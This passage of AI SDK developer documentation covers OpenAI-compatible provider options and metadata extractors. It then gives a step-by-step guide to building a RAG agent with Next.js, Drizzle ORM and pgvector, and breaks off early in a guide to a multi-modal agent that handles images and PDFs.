text: 'A sunlit indoor lounge area with a pool containing a flamingo',
images: [image],
mask,
},
});
Embedding Models
You can create embedding models using the .embeddingModel() factory method:
const model = provider.embeddingModel('model-id');
Example
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { embed } from 'ai';
const provider = createOpenAICompatible({
name: 'providerName',
apiKey: process.env.PROVIDER_API_KEY,
baseURL: 'https://api.provider.com/v1',
});
const { embedding } = await embed({
model: provider.embeddingModel('text-embedding-model'),
value: 'The quick brown fox jumps over the lazy dog',
});
Embedding Model Options
The following provider options are available for embedding models via providerOptions:
- `dimensions` (number): The number of dimensions the resulting output embeddings should have. Only supported in models that allow dimension configuration.
- `user` (string): A unique identifier representing your end-user, which can help providers to monitor and detect abuse.
const { embedding } = await embed({
model: provider.embeddingModel('text-embedding-model'),
value: 'The quick brown fox jumps over the lazy dog',
providerOptions: {
providerName: {
dimensions: 512,
user: 'user-123',
},
},
});
Completion Models
You can create completion models (for text completion, not chat) using the .completionModel() factory method:
const model = provider.completionModel('model-id');
Example
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';
const provider = createOpenAICompatible({
name: 'providerName',
apiKey: process.env.PROVIDER_API_KEY,
baseURL: 'https://api.provider.com/v1',
});
const { text } = await generateText({
model: provider.completionModel('completion-model-id'),
prompt: 'The quick brown fox',
});
Completion Model Options
The following provider options are available for completion models via providerOptions:
- `echo` (boolean): Echo back the prompt in addition to the completion.
- `logitBias` (Record<string, number>): Modify the likelihood of specified tokens appearing in the completion. Accepts a JSON object that maps tokens (specified by their token ID) to an associated bias value from -100 to 100.
- `suffix` (string): The suffix that comes after a completion of inserted text.
- `user` (string): A unique identifier representing your end-user, which can help providers to monitor and detect abuse.
const { text } = await generateText({
model: provider.completionModel('completion-model-id'),
prompt: 'The quick brown fox',
providerOptions: {
providerName: {
echo: true,
suffix: ' The end.',
user: 'user-123',
},
},
});
Chat Model Options
The following provider options are available for chat models via providerOptions:
- `user` (string): A unique identifier representing your end-user, which can help the provider to monitor and detect abuse.
- `reasoningEffort` (string): Reasoning effort for reasoning models. The exact values depend on the provider.
- `textVerbosity` (string): Controls the verbosity of the generated text. The exact values depend on the provider.
- `strictJsonSchema` (boolean): Whether to use strict JSON schema validation. When true, the model uses constrained decoding to guarantee schema compliance. Only used when the provider supports structured outputs and a schema is provided. Defaults to `true`.
const { text } = await generateText({
model: provider('model-id'),
prompt: 'Solve this step by step: What is 15 * 23?',
providerOptions: {
providerName: {
user: 'user-123',
reasoningEffort: 'high',
},
},
});
Provider-specific options
The OpenAI Compatible provider supports adding provider-specific options to the request body. These are specified with the providerOptions field in the request body.
For example, if you create a provider instance with the name providerName, you can add a customOption field to the request body like this:
const provider = createOpenAICompatible({
name: 'providerName',
apiKey: process.env.PROVIDER_API_KEY,
baseURL: 'https://api.provider.com/v1',
});
const { text } = await generateText({
model: provider('model-id'),
prompt: 'Hello',
providerOptions: {
providerName: { customOption: 'magic-value' },
},
});
Note that the providerOptions key will be in camelCase. If you set the provider name to provider-name, the options still need to be set on providerOptions.providerName.
The request body sent to the provider will include the customOption field with the value magic-value. This gives you an easy way to add provider-specific options to requests without having to modify the provider or AI SDK code.
Custom Metadata Extraction
The OpenAI Compatible provider supports extracting provider-specific metadata from API responses through metadata extractors. These extractors allow you to capture additional information returned by the provider beyond the standard response format.
Metadata extractors receive the raw, unprocessed response data from the provider, giving you complete flexibility to extract any custom fields or experimental features that the provider may include. This is particularly useful when:
- Working with providers that include non-standard response fields
- Experimenting with beta or preview features
- Capturing provider-specific metrics or debugging information
- Supporting rapid provider API evolution without SDK changes
Metadata extractors work with both streaming and non-streaming chat completions and consist of two main components:
- A function to extract metadata from complete responses
- A streaming extractor that can accumulate metadata across chunks in a streaming response
Here's an example metadata extractor that captures both standard and custom provider data:
import { MetadataExtractor } from '@ai-sdk/openai-compatible';
const myMetadataExtractor: MetadataExtractor = {
// Process complete, non-streaming responses
extractMetadata: ({ parsedBody }) => {
// You have access to the complete raw response
// Extract any fields the provider includes
return {
myProvider: {
standardUsage: parsedBody.usage,
experimentalFeatures: parsedBody.beta_features,
customMetrics: {
processingTime: parsedBody.server_timing?.total_ms,
modelVersion: parsedBody.model_version,
// ... any other provider-specific data
},
},
};
},
// Process streaming responses
createStreamExtractor: () => {
let accumulatedData = {
timing: [],
customFields: {},
};
return {
// Process each chunk's raw data
processChunk: parsedChunk => {
if (parsedChunk.server_timing) {
accumulatedData.timing.push(parsedChunk.server_timing);
}
if (parsedChunk.custom_data) {
Object.assign(accumulatedData.customFields, parsedChunk.custom_data);
}
},
// Build final metadata from accumulated data
buildMetadata: () => ({
myProvider: {
streamTiming: accumulatedData.timing,
customData: accumulatedData.customFields,
},
}),
};
},
};
You can provide a metadata extractor when creating your provider instance:
const provider = createOpenAICompatible({
name: 'my-provider',
apiKey: process.env.PROVIDER_API_KEY,
baseURL: 'https://api.provider.com/v1',
metadataExtractor: myMetadataExtractor,
});
The extracted metadata will be included in the response under the providerMetadata field:
const { text, providerMetadata } = await generateText({
model: provider('model-id'),
prompt: 'Hello',
});
console.log(providerMetadata.myProvider.customMetrics);
This allows you to access provider-specific information while maintaining a consistent interface across different providers.
title: RAG Agent
description: Learn how to build a RAG Agent with the AI SDK and Next.js
tags: ['rag', 'chatbot', 'next', 'embeddings', 'database', 'retrieval', 'memory', 'agent']
RAG Agent Guide
In this guide, you will learn how to build a retrieval-augmented generation (RAG) agent.
Before we dive in, let's look at what RAG is, and why we would want to use it.
What is RAG?
RAG stands for retrieval augmented generation. In simple terms, RAG is the process of providing a Large Language Model (LLM) with specific information relevant to the prompt.
Why is RAG important?
While LLMs are powerful, the information they can reason about is restricted to the data they were trained on. This problem becomes apparent when asking an LLM for information outside of its training data, like proprietary data or common knowledge from after the model's training cutoff. RAG solves this problem by fetching information relevant to the prompt and then passing that to the model as context.
To illustrate with a basic example, imagine asking the model for your favorite food:
**input**
What is my favorite food?
**generation**
I don't have access to personal information about individuals, including their
favorite foods.
Not surprisingly, the model doesn’t know. But imagine, alongside your prompt, the model received some extra context:
**input**
Respond to the user's prompt using only the provided context.
user prompt: 'What is my favorite food?'
context: user loves chicken nuggets
**generation**
Your favorite food is chicken nuggets!
Just like that, you have augmented the model's generation by providing relevant information to the query. Assuming the model has the appropriate information, it is now highly likely to return an accurate response to the user's query. But how does it retrieve the relevant information? The answer relies on a concept called embedding.
Embedding
Embeddings are a way to represent words, phrases, or images as vectors in a high-dimensional space. In this space, similar words are close to each other, and the distance between words can be used to measure their similarity.
In practice, this means that if you embedded the words cat and dog, you would expect them to be plotted close to each other in vector space. A common way to calculate the similarity between two vectors is cosine similarity, where a value of 1 indicates the vectors point in the same direction (high similarity) and a value of -1 indicates they point in opposite directions (high dissimilarity).
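To make this concrete, here is a minimal sketch of cosine similarity over two plain number arrays; in your application you would typically let the database (or a utility from your ORM) compute this, as you will see later in this guide:
// Cosine similarity: dot(a, b) / (|a| * |b|), a value between -1 and 1.
const cosineSimilarity = (a: number[], b: number[]): number => {
  if (a.length !== b.length) throw new Error('Vectors must be the same length');
  let dot = 0;
  let normA = 0;
  let normB = 0;
  for (let i = 0; i < a.length; i++) {
    dot += a[i] * b[i];
    normA += a[i] * a[i];
    normB += b[i] * b[i];
  }
  return dot / (Math.sqrt(normA) * Math.sqrt(normB));
};
// Vectors pointing the same way score near 1; opposite ways score near -1.
console.log(cosineSimilarity([1, 2, 3], [2, 4, 6])); // 1
console.log(cosineSimilarity([1, 0], [-1, 0])); // -1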
As mentioned above, embeddings are a way to represent the semantic meaning of words and phrases. The implication here is that the larger the input to your embedding, the lower quality the embedding will be. So how would you approach embedding content longer than a simple phrase?
Chunking
Chunking refers to the process of breaking down a particular source material into smaller pieces. There are many different approaches to chunking and it’s worth experimenting as the most effective approach can differ by use case. A simple and common approach to chunking (and what you will be using in this guide) is separating written content by sentences.
Once your source material is appropriately chunked, you can embed each one and then store the embedding and the chunk together in a database. Embeddings can be stored in any database that supports vectors. For this tutorial, you will be using Postgres alongside the pgvector plugin.
All Together Now
Combining all of this together, RAG is the process of enabling the model to respond with information outside of its training data by embedding the user's query, retrieving the relevant source material (chunks) with the highest semantic similarity, and then passing them alongside the initial query as context. Going back to the example where you ask the model for your favorite food, this is exactly how the extra context was prepared.
By passing the appropriate context and refining the model’s objective, you are able to fully leverage its strengths as a reasoning machine.
Onto the project!
Project Setup
In this project, you will build an agent that will only respond with information that it has within its knowledge base. The agent will be able to both store and retrieve information. This project has many interesting use cases, from customer support through to building your own second brain!
This project will use the following stack:
- Next.js 14 (App Router)
- AI SDK
- Vercel AI Gateway
- Drizzle ORM
- Postgres with pgvector
- shadcn-ui and TailwindCSS for styling
Clone Repo
To reduce the scope of this guide, you will be starting with a repository that already has a few things set up for you:
- Drizzle ORM (lib/db) including an initial migration and a script to migrate (db:migrate)
- a basic schema for the resources table (this will be for source material)
- a Server Action for creating a resource
To get started, clone the starter repository with the following command:
<Snippet text={[ 'git clone https://github.com/vercel/ai-sdk-rag-starter', 'cd ai-sdk-rag-starter', ]} />
First things first, run the following command to install the project's dependencies:
<Snippet text={['pnpm install']} />
Create Database
You will need a Postgres database to complete this tutorial. If you don't have Postgres set up on your local machine, you can:
- Create a free Postgres database with Vercel (recommended - see instructions below); or
- Follow this guide to set it up locally
Setting up Postgres with Vercel
To set up a Postgres instance on your Vercel account:
- Go to Vercel.com and make sure you're logged in
- Navigate to your team homepage
- Click on the Integrations tab
- Click Browse Marketplace
- Look for the Storage option in the sidebar
- Select the Neon option (recommended, but any other PostgreSQL database provider should work)
- Click Install, then click Install again in the top right corner
- On the "Get Started with Neon" page, click Create Database on the right
- Select your region (e.g., Washington, D.C., U.S. East)
- Turn off Auth
- Click Continue
- Name your database (you can use the default name or rename it to something like "RagTutorial")
- Click Create in the bottom right corner
- After seeing "Database created successfully", click Done
- You'll be redirected to your database instance
- In the Quick Start section, click Show secrets
- Copy the full DATABASE_URL environment variable
Migrate Database
Once you have a Postgres database, you need to add the connection string as an environment secret.
Make a copy of the .env.example file and rename it to .env.
Open the new .env file. You should see an item called DATABASE_URL. Copy in your database connection string after the equals sign.
With that set up, you can now run your first database migration. Run the following command:
<Snippet text={['pnpm db:migrate']} />
This will first add the pgvector extension to your database. Then it will create a new table for your resources schema that is defined in lib/db/schema/resources.ts. This schema has four columns: id, content, createdAt, and updatedAt.
Vercel AI Gateway Key
For this guide, you will need a Vercel AI Gateway API key, which gives you access to hundreds of models from different providers with one API key. If you haven't obtained your Vercel AI Gateway API key, you can do so by signing up on the Vercel website.
Now, open your .env file and add your AI Gateway API key:
AI_GATEWAY_API_KEY=your-api-key
Replace your-api-key with your actual Vercel AI Gateway API key.
Build
Let’s build a quick task list of what needs to be done:
- Create a table in your database to store embeddings
- Add logic to chunk and create embeddings when creating resources
- Create an agent
- Give the agent tools to query / create resources for its knowledge base
Create Embeddings Table
Currently, your application has one table (resources) which has a column (content) for storing content. Remember, each resource (source material) will have to be chunked, embedded, and then stored. Let’s create a table called embeddings to store these chunks.
Create a new file (lib/db/schema/embeddings.ts) and add the following code:
import { nanoid } from '@/lib/utils';
import { index, pgTable, text, varchar, vector } from 'drizzle-orm/pg-core';
import { resources } from './resources';
export const embeddings = pgTable(
'embeddings',
{
id: varchar('id', { length: 191 })
.primaryKey()
.$defaultFn(() => nanoid()),
resourceId: varchar('resource_id', { length: 191 }).references(
() => resources.id,
{ onDelete: 'cascade' },
),
content: text('content').notNull(),
embedding: vector('embedding', { dimensions: 1536 }).notNull(),
},
table => ({
embeddingIndex: index('embeddingIndex').using(
'hnsw',
table.embedding.op('vector_cosine_ops'),
),
}),
);
This table has four columns:
- id - unique identifier
- resourceId - a foreign key relation to the full source material
- content - the plain text chunk
- embedding - the vector representation of the plain text chunk
To perform similarity search, you also need to include an index (HNSW or IVFFlat) on the embedding column for better performance.
To push this change to the database, run the following command:
<Snippet text={['pnpm db:push']} />
Add Embedding Logic
Now that you have a table to store embeddings, it’s time to write the logic to create the embeddings.
Create a new file at lib/ai/embedding.ts.
Generate Chunks
Remember, to create an embedding, you will start with a piece of source material (unknown length), break it down into smaller chunks, embed each chunk, and then save the chunk to the database. Let’s start by creating a function to break the source material into small chunks.
const generateChunks = (input: string): string[] => {
return input
.trim()
.split('.')
.filter(i => i !== '');
};
This function will take an input string and split it by periods, filtering out any empty items. This will return an array of strings. It is worth experimenting with different chunking techniques in your projects as the best technique will vary.
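If sentence splitting doesn't fit your content, one common alternative is fixed-size chunks with overlap, so that context straddling a boundary appears in two neighboring chunks. A minimal sketch (the sizes below are arbitrary illustrative values, not recommendations from this guide):
// Hypothetical alternative chunker: fixed-size windows with overlap.
const generateOverlappingChunks = (
  input: string,
  chunkSize = 200,
  overlap = 40,
): string[] => {
  if (overlap >= chunkSize) throw new Error('overlap must be smaller than chunkSize');
  const chunks: string[] = [];
  // Step forward by (chunkSize - overlap) so consecutive chunks share text.
  for (let start = 0; start < input.length; start += chunkSize - overlap) {
    const chunk = input.slice(start, start + chunkSize).trim();
    if (chunk !== '') chunks.push(chunk);
  }
  return chunks;
};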
Install AI SDK
You will use the AI SDK to create embeddings. This will require two more dependencies, which you can install by running the following command:
<Snippet text={['pnpm add ai @ai-sdk/react']} />
This will install the AI SDK and the AI SDK's React hooks.
Generate Embeddings
Let’s add a function to generate embeddings. Copy the following code into your lib/ai/embedding.ts file.
import { embedMany } from 'ai';
const embeddingModel = 'openai/text-embedding-ada-002';
const generateChunks = (input: string): string[] => {
return input
.trim()
.split('.')
.filter(i => i !== '');
};
export const generateEmbeddings = async (
value: string,
): Promise<Array<{ embedding: number[]; content: string }>> => {
const chunks = generateChunks(value);
const { embeddings } = await embedMany({
model: embeddingModel,
values: chunks,
});
return embeddings.map((e, i) => ({ content: chunks[i], embedding: e }));
};
In this code, you first define the model you want to use for the embeddings. In this example, you are using OpenAI’s text-embedding-ada-002 embedding model.
Next, you create an asynchronous function called generateEmbeddings. This function will take in the source material (value) as an input and return a promise of an array of objects, each containing an embedding and content. Within the function, you first generate chunks for the input. Then, you pass those chunks to the embedMany function imported from the AI SDK which will return embeddings of the chunks you passed in. Finally, you map over and return the embeddings in a format that is ready to save in the database.
Update Server Action
Open the file at lib/actions/resources.ts. This file has one function, createResource, which, as the name implies, allows you to create a resource.
'use server';
import {
NewResourceParams,
insertResourceSchema,
resources,
} from '@/lib/db/schema/resources';
import { db } from '../db';
export const createResource = async (input: NewResourceParams) => {
try {
const { content } = insertResourceSchema.parse(input);
const [resource] = await db
.insert(resources)
.values({ content })
.returning();
return 'Resource successfully created.';
} catch (e) {
if (e instanceof Error)
return e.message.length > 0 ? e.message : 'Error, please try again.';
}
};
This function is a Server Action, as denoted by the 'use server'; directive at the top of the file. This means that it can be called from anywhere in your Next.js application. This function takes an input, runs it through a Zod schema to ensure it adheres to the correct shape, and then creates a new resource in the database. This is the ideal location to generate and store embeddings of newly created resources.
Update the file with the following code:
'use server';
import {
NewResourceParams,
insertResourceSchema,
resources,
} from '@/lib/db/schema/resources';
import { db } from '../db';
import { generateEmbeddings } from '../ai/embedding';
import { embeddings as embeddingsTable } from '../db/schema/embeddings';
export const createResource = async (input: NewResourceParams) => {
try {
const { content } = insertResourceSchema.parse(input);
const [resource] = await db
.insert(resources)
.values({ content })
.returning();
const embeddings = await generateEmbeddings(content);
await db.insert(embeddingsTable).values(
embeddings.map(embedding => ({
resourceId: resource.id,
...embedding,
})),
);
return 'Resource successfully created and embedded.';
} catch (error) {
return error instanceof Error && error.message.length > 0
? error.message
: 'Error, please try again.';
}
};
First, you call the generateEmbeddings function created in the previous step, passing in the source material (content). Once you have the embeddings of the source material, you can save them to the database, passing the resourceId alongside each embedding.
Create Root Page
Great! Let's build the frontend. The AI SDK’s useChat hook allows you to easily create a conversational user interface for your agent.
Replace your root page (app/page.tsx) with the following code.
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Chat() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat();
return (
<div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
<div className="space-y-4">
{messages.map(m => (
<div key={m.id} className="whitespace-pre-wrap">
<div>
<div className="font-bold">{m.role}</div>
{m.parts.map(part => {
switch (part.type) {
case 'text':
return <p>{part.text}</p>;
}
})}
</div>
</div>
))}
</div>
<form
onSubmit={e => {
e.preventDefault();
sendMessage({ text: input });
setInput('');
}}
>
<input
className="fixed bottom-0 w-full max-w-md p-2 mb-8 border border-gray-300 rounded shadow-xl"
value={input}
placeholder="Say something..."
onChange={e => setInput(e.currentTarget.value)}
/>
</form>
</div>
);
}
The useChat hook enables the streaming of chat messages from your AI provider (you will be using OpenAI via the Vercel AI Gateway), manages the state for chat input, and updates the UI automatically as new messages are received.
Run the following command to start the Next.js dev server:
<Snippet text={['pnpm run dev']} />
Head to http://localhost:3000. You should see an empty screen with an input bar floating at the bottom. Try to send a message. The message shows up in the UI for a fraction of a second and then disappears. This is because you haven’t set up the corresponding API route to call the model! By default, useChat will send a POST request to the /api/chat endpoint with the messages as the request body.
You can customize the endpoint in the useChat configuration object.
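For example, using the DefaultChatTransport (shown again in the multi-modal guide later in this document), you could point the hook at a hypothetical /api/custom-chat route:
'use client';
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
export function CustomEndpointChat() {
  // Hypothetical route: send chat requests to /api/custom-chat instead of /api/chat
  const { messages, sendMessage } = useChat({
    transport: new DefaultChatTransport({ api: '/api/custom-chat' }),
  });
  // ...render messages and an input as in the page above
  return null;
}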
Create API Route
In Next.js, you can create custom request handlers for a given route using Route Handlers. Route Handlers are defined in a route.ts file and can export HTTP methods like GET, POST, PUT, and PATCH.
Create a file at app/api/chat/route.ts.
Open the file and add the following code:
import { convertToModelMessages, streamText, UIMessage } from 'ai';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: 'openai/gpt-4o',
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
In this code, you declare and export an asynchronous function called POST. You retrieve the messages from the request body and then pass them to the streamText function imported from the AI SDK, alongside the model you would like to use. Finally, you return the model’s response in UIMessageStreamResponse format.
Head back to the browser and try to send a message again. You should see a response from the model streamed directly in!
Refining your prompt
While you now have a working agent, it isn't doing anything special.
Let’s add system instructions to refine and restrict the model’s behavior. In this case, you want the model to only use information it has retrieved to generate responses. Update your route handler with the following code:
import { convertToModelMessages, streamText, UIMessage } from 'ai';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: 'openai/gpt-4o',
system: `You are a helpful assistant. Check your knowledge base before answering any questions.
Only respond to questions using information from tool calls.
if no relevant information is found in the tool calls, respond, "Sorry, I don't know."`,
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
Head back to the browser and try to ask the model what your favorite food is. The model should now respond exactly as you instructed above (“Sorry, I don’t know”) given it doesn’t have any relevant information.
In its current form, your agent is now, well, useless. How do you give the model the ability to add and query information?
Using Tools
A tool is a function that can be called by the model to perform a specific task. You can think of a tool like a program you give to the model that it can run as and when it deems necessary.
Let’s see how you can create a tool to give the model the ability to create, embed and save a resource to your agents’ knowledge base.
Add Resource Tool
Update your route handler with the following code:
import { createResource } from '@/lib/actions/resources';
import { convertToModelMessages, streamText, tool, UIMessage } from 'ai';
import { z } from 'zod';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: 'openai/gpt-4o',
system: `You are a helpful assistant. Check your knowledge base before answering any questions.
Only respond to questions using information from tool calls.
if no relevant information is found in the tool calls, respond, "Sorry, I don't know."`,
messages: await convertToModelMessages(messages),
tools: {
addResource: tool({
description: `add a resource to your knowledge base.
If the user provides a random piece of knowledge unprompted, use this tool without asking for confirmation.`,
inputSchema: z.object({
content: z
.string()
.describe('the content or resource to add to the knowledge base'),
}),
execute: async ({ content }) => createResource({ content }),
}),
},
});
return result.toUIMessageStreamResponse();
}
In this code, you define a tool called addResource. This tool has three elements:
- description: description of the tool that will influence when the tool is picked.
- inputSchema: Zod schema that defines the input necessary for the tool to run.
- execute: An asynchronous function that is called with the arguments from the tool call.
In simple terms, on each generation, the model will decide whether it should call the tool. If it deems it should call the tool, it will extract the input and then append a new message to the messages array of type tool-call. The AI SDK will then run the execute function with the parameters provided by the tool-call message.
Head back to the browser and tell the model your favorite food. You should see an empty response in the UI. Did anything happen? Let's see. Run the following command in a new terminal window.
<Snippet text={['pnpm db:studio']} />
This will start Drizzle Studio, where you can view the rows in your database. You should see a new row in both the embeddings and resources tables with your favorite food!
Let’s make a few changes in the UI to communicate to the user when a tool has been called. Head back to your root page (app/page.tsx) and add the following code:
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Chat() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat();
return (
<div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
<div className="space-y-4">
{messages.map(m => (
<div key={m.id} className="whitespace-pre-wrap">
<div>
<div className="font-bold">{m.role}</div>
{m.parts.map(part => {
switch (part.type) {
case 'text':
return <p>{part.text}</p>;
case 'tool-addResource':
case 'tool-getInformation':
return (
<p>
call{part.state === 'output-available' ? 'ed' : 'ing'}{' '}
tool: {part.type}
<pre className="my-4 bg-zinc-100 p-2 rounded-sm">
{JSON.stringify(part.input, null, 2)}
</pre>
</p>
);
}
})}
</div>
</div>
))}
</div>
<form
onSubmit={e => {
e.preventDefault();
sendMessage({ text: input });
setInput('');
}}
>
<input
className="fixed bottom-0 w-full max-w-md p-2 mb-8 border border-gray-300 rounded shadow-xl"
value={input}
placeholder="Say something..."
onChange={e => setInput(e.currentTarget.value)}
/>
</form>
</div>
);
}
With this change, you now conditionally render the tool that has been called directly in the UI. Save the file and head back to the browser. Tell the model your favorite movie. You should see which tool is called in place of the model's typical text response.
Improving UX with Multi-Step Calls
It would be nice if the model could summarize the action too. However, technically, once the model calls a tool, it has completed its generation, as it 'generated' a tool call. How could you achieve this desired behavior?
The AI SDK has a feature called stopWhen which allows you to define stopping conditions for multi-step generations. If those stopping conditions haven't been hit after the model generates a tool call, the AI SDK will automatically send the tool call results back to the model!
Open your route handler (app/api/chat/route.ts) and add the following key to the streamText configuration object:
import { createResource } from '@/lib/actions/resources';
import {
convertToModelMessages,
streamText,
tool,
UIMessage,
stepCountIs,
} from 'ai';
import { z } from 'zod';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: 'openai/gpt-4o',
system: `You are a helpful assistant. Check your knowledge base before answering any questions.
Only respond to questions using information from tool calls.
if no relevant information is found in the tool calls, respond, "Sorry, I don't know."`,
messages: await convertToModelMessages(messages),
stopWhen: stepCountIs(5),
tools: {
addResource: tool({
description: `add a resource to your knowledge base.
If the user provides a random piece of knowledge unprompted, use this tool without asking for confirmation.`,
inputSchema: z.object({
content: z
.string()
.describe('the content or resource to add to the knowledge base'),
}),
execute: async ({ content }) => createResource({ content }),
}),
},
});
return result.toUIMessageStreamResponse();
}
Head back to the browser and tell the model your favorite pizza topping (note: pineapple is not an option). You should see a follow-up response from the model confirming the action.
Retrieve Resource Tool
The model can now add and embed arbitrary information to your knowledge base. However, it still isn’t able to query it. Let’s create a new tool to allow the model to answer questions by finding relevant information in your knowledge base.
To find similar content, you will need to embed the user's query, search the database for semantic similarity, and then pass those items to the model as context alongside the query. To achieve this, let's update your embedding logic file (lib/ai/embedding.ts):
import { embed, embedMany } from 'ai';
import { db } from '../db';
import { cosineDistance, desc, gt, sql } from 'drizzle-orm';
import { embeddings } from '../db/schema/embeddings';
const embeddingModel = 'openai/text-embedding-ada-002';
const generateChunks = (input: string): string[] => {
return input
.trim()
.split('.')
.filter(i => i !== '');
};
export const generateEmbeddings = async (
value: string,
): Promise<Array<{ embedding: number[]; content: string }>> => {
const chunks = generateChunks(value);
const { embeddings } = await embedMany({
model: embeddingModel,
values: chunks,
});
return embeddings.map((e, i) => ({ content: chunks[i], embedding: e }));
};
export const generateEmbedding = async (value: string): Promise<number[]> => {
const input = value.replaceAll('\n', ' ');
const { embedding } = await embed({
model: embeddingModel,
value: input,
});
return embedding;
};
export const findRelevantContent = async (userQuery: string) => {
const userQueryEmbedded = await generateEmbedding(userQuery);
const similarity = sql<number>`1 - (${cosineDistance(
embeddings.embedding,
userQueryEmbedded,
)})`;
const similarGuides = await db
.select({ name: embeddings.content, similarity })
.from(embeddings)
.where(gt(similarity, 0.5))
.orderBy(t => desc(t.similarity))
.limit(4);
return similarGuides;
};
In this code, you add two functions:
- generateEmbedding: generates a single embedding from an input string
- findRelevantContent: embeds the user's query, searches the database for similar items, then returns relevant items
With that done, it’s onto the final step: creating the tool.
Go back to your route handler (app/api/chat/route.ts) and add a new tool called getInformation:
import { createResource } from '@/lib/actions/resources';
import {
convertToModelMessages,
streamText,
tool,
UIMessage,
stepCountIs,
} from 'ai';
import { z } from 'zod';
import { findRelevantContent } from '@/lib/ai/embedding';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: 'openai/gpt-4o',
messages: await convertToModelMessages(messages),
stopWhen: stepCountIs(5),
system: `You are a helpful assistant. Check your knowledge base before answering any questions.
Only respond to questions using information from tool calls.
if no relevant information is found in the tool calls, respond, "Sorry, I don't know."`,
tools: {
addResource: tool({
description: `add a resource to your knowledge base.
If the user provides a random piece of knowledge unprompted, use this tool without asking for confirmation.`,
inputSchema: z.object({
content: z
.string()
.describe('the content or resource to add to the knowledge base'),
}),
execute: async ({ content }) => createResource({ content }),
}),
getInformation: tool({
description: `get information from your knowledge base to answer questions.`,
inputSchema: z.object({
question: z.string().describe('the users question'),
}),
execute: async ({ question }) => findRelevantContent(question),
}),
},
});
return result.toUIMessageStreamResponse();
}
Head back to the browser, refresh the page, and ask for your favorite food. You should see the model call the getInformation tool, and then use the relevant information to formulate a response!
Conclusion
Congratulations, you have successfully built an AI agent that can dynamically add and retrieve information to and from a knowledge base. Throughout this guide, you learned how to create and store embeddings, set up server actions to manage resources, and use tools to extend the capabilities of your agent.
Troubleshooting Migration Error
If you experience an error with the migration, open your migration file (lib/db/migrations/0000_yielding_bloodaxe.sql), cut (copy and remove) the first line, and run it directly on your postgres instance. You should now be able to run the updated migration.
If you're using the Vercel setup above, you can run the command directly by either:
- Going to the Neon console and entering the command there, or
- Going back to the Vercel platform, navigating to the Quick Start section of your database, and finding the PSQL connection command (second tab). This will connect to your instance in the terminal where you can run the command directly.
title: Multi-Modal Agent
description: Learn how to build a multi-modal agent that can process images and PDFs with the AI SDK.
tags: ['multi-modal', 'agent', 'images', 'pdf', 'vision', 'next']
Multi-Modal Agent
In this guide, you will build a multi-modal agent capable of understanding both images and PDFs.
Multi-modal refers to the ability of the agent to understand and generate responses in multiple formats. In this guide, we'll focus on images and PDFs - two common document types that modern language models can process natively.
We'll build this agent using OpenAI's GPT-4o, but the same code works seamlessly with other providers - you can switch between them by changing just one line of code.
Prerequisites
To follow this quickstart, you'll need:
- Node.js 18+ and pnpm installed on your local development machine.
- A Vercel AI Gateway API key.
If you haven't obtained your Vercel AI Gateway API key, you can do so by signing up on the Vercel website.
Create Your Application
Start by creating a new Next.js application. This command will create a new directory named multi-modal-agent and set up a basic Next.js application inside it.
<Snippet text={['pnpm create next-app@latest multi-modal-agent']} />
Navigate to the newly created directory:
<Snippet text={['cd multi-modal-agent']} />
Install dependencies
Install ai and @ai-sdk/react, the AI SDK package and the AI SDK's React package respectively.
<Snippet text={['bun add ai @ai-sdk/react']} />
Configure your Vercel AI Gateway API key
Create a .env.local file in your project root and add your Vercel AI Gateway API key. This key authenticates your application with Vercel AI Gateway.
Edit the .env.local file:
AI_GATEWAY_API_KEY=your_api_key_here
Replace your_api_key_here with your actual Vercel AI Gateway API key.
Implementation Plan
To build a multi-modal agent, you will need to:
- Create a Route Handler to handle incoming chat messages and generate responses.
- Wire up the UI to display chat messages, provide a user input, and handle submitting new messages.
- Add the ability to upload images and PDFs and attach them alongside the chat messages.
Create a Route Handler
Create a route handler at app/api/chat/route.ts and add the following code:
import { streamText, convertToModelMessages, type UIMessage } from 'ai';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: 'openai/gpt-4o',
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
Let's take a look at what is happening in this code:
- Define an asynchronous POST request handler and extract messages from the body of the request. The messages variable contains a history of the conversation between you and the agent and provides the agent with the necessary context to make the next generation.
- Convert the UI messages to model messages using convertToModelMessages, which transforms the UI-focused message format to the format expected by the language model.
- Call streamText, which is imported from the ai package. This function accepts a configuration object that contains a model provider and messages (converted in step 2). You can pass additional settings to further customize the model's behavior.
- The streamText function returns a StreamTextResult. This result object contains the toUIMessageStreamResponse function which converts the result to a streamed response object.
- Finally, return the result to the client to stream the response.
This Route Handler creates a POST request endpoint at /api/chat.
Wire up the UI
Now that you have a Route Handler that can query a large language model (LLM), it's time to set up your frontend. AI SDK UI abstracts the complexity of a chat interface into one hook, useChat.
Update your root page (app/page.tsx) with the following code to show a list of chat messages and provide a user message input:
'use client';
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';
export default function Chat() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat({
transport: new DefaultChatTransport({
api: '/api/chat',
}),
});
return (
